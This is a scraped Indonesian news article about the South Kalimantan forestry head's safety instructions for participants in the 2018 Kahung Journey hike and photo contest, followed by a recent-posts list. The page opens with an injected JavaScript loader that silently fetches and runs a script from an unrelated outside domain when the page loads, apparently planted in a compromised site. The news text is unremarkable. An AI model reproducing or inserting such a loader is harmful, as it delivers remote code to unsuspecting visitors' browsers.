(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
DISHUT PROV KALSEL

Kadishut Kalsel Tekankan Keamanan dan Keselamatan Peserta Kahung Journey 2018


BANJARBARU, Kepala Dinas Kehutanan Provinsi Kalsel Dr Hanif Faisol Nurofiq menekankan keamanan dan keselamatan peserta Kahung Journey merupakan prioritas utama.  Hal tersebut dia sampaikan pada saat memimpin apel pagi di Lapangan Desa Belangian dalam rangkaian mengawali acara peringatan Hari Bakti Rimbawan dan Hari Hutan Internasional 2018 bertajuk ‘Kahung Journey’, Minggu (1/4) pagi.

“Keamanan dan keselamatan para peserta merupakan hal prioritas utama. Apabila pada pukul dua siang para peserta fun hiking dan lomba fotografi belum mencapai air terjun kahung besar, seluruh peserta diwajibkan kembali pulang menuju desa Belangian tanpa terkecuali dan tanpa alasan apa pun,” amanatnya di hadapan seluruh peserta.

Untuk memastikan hal tersebut, Hanif menginstruksikan kepada para panitia di lapangan agar mencatat dan meregestrasi seluruh peserta pada pos pintu gerbang di lapangan baik pada saat keberangkatan dan saat kepulangan satu per satu tanpa kecuali.

“Di setiap pos penjagaan harus menjadi orang yang terakhir pulang menuju desa. Hal tersebut dilakukan untuk memastikan seluruh peserta kegiatan kembali pulang menuju desa tanpa ada satu pun yang terlewatkan,”tegasnya.

Di tempat yang sama Kepala Desa Desa Belangian, Fahruddin menyampaikan rasa terima kasih kepada Dinas Kehutanan Kalsel selaku penyelenggara kegiatan karena telah menjadikan desa Belangian sebagai tempat penyelenggaraan acara.

Fahruddin juga menyampaikan hal-hal terkait aturan setempat yang harus diperhatikan dan wajib dipatuhi oleh seluruh peserta kegiatan pada saat memasuki kawasan hutan ‘perawan’ Kahung.

Apel pagi diakhiri penyerahan bantuan 50 batang bibit tanaman Kelengkeng yang diserahkan secara simbolis oleh Kadishut Kalsel kepada Pembakal desa Belangian.

Peserta fun hiking bergerak memulai perjalan menuju air terjun kahung besar pukul 07.00 pagi. Semua peserta diantar Tim Trail menuju Shelter Pertama atau Shelter Kembar secara bertahap, selanjutnya para peserta melanjutkan perjalanan ke tempat tujuan sesuai kondisi kemampuan peserta, sebab panitia hanya memberikan batas waktu hingga pukul 14.00 siang. Apabila peserta tidak mampu mencapai tujuan pada jam yang sudah ditentukan, maka para peserta diwajibkan ‘balik kanan’ pulang kembali menuju desa Belangian, demi keamanan seluruh peserta kegiatan.

Panitia juga menempatkan tim radio (komunikasi), tim keamanan, tim medis, dan tim evakuasi di setiap pos jalur fun hiking untuk menghindari dan meminimalisir hal-hal yang tidak diinginkan. (abdullah)

Reporter : Abdullah
Editor : Chell

Desy Arfianty

Recent Posts

25 Anggota PPK Kota Banjarbaru Dilantik, Langsung Bekerja Membentuk Sekretariat

KANALKALIMANTAN.COM, BANJARBARU - Komisi Pemilihan Umum (KPU) Kota Banjarbaru resmi melantik 25 orang anggota Panitia… Read More

3 jam ago

Kearifan Lokal Kalsel Harus Dibaca dan Ditulis Generasi Muda

KANALKALIMANTAN.COM, BANJARMASIN - Dinas Perpustakaan dan Kearsipan Provinsi Kalimantan Selatan (Kalsel) menggelar acara sosialisasi budaya… Read More

14 jam ago

Sekda HSU Sampaikan Raperda Pertanggungjawaban Pelaksanaan APBD 2023, Ini Angka Detailnya

KANALKALIMANTAN.COM, AMUNTAI - Sekretaris Daerah (Sekda) Hulu Sungai Utara (HSU) Adi Lesmana menyebut capaian target… Read More

16 jam ago

Permudah Kebutuhan Transaksi Jemaah Haji di Tanah Suci dengan BRImo

KANALKALIMANTAN.COM- Ibadah haji merupakan salah satu impian bagi umat Islam di seluruh dunia. Agar ibadah… Read More

16 jam ago

Bawaslu Banjarbaru Seleksi Panwascam Hanya di Empat Kecamatan

KANALKALIMANTAN.COM, BANJARBARU - Badan Pengawas Pemilihan Umum (Bawaslu) Kota Banjarbaru tengah merekrut Panitia Pengawas Kecamatan… Read More

16 jam ago

Pemko Banjarbaru Bentuk Tim Desk Pilkada 2024

KANALKALIMANTAN.COM, BANJARBARU - Pemerintah Kota (Pemko) Banjarbaru Provinsi Kalimantan Selatan (Kalsel) membentuk Tim Desk Pilkada… Read More

18 jam ago

This website uses cookies.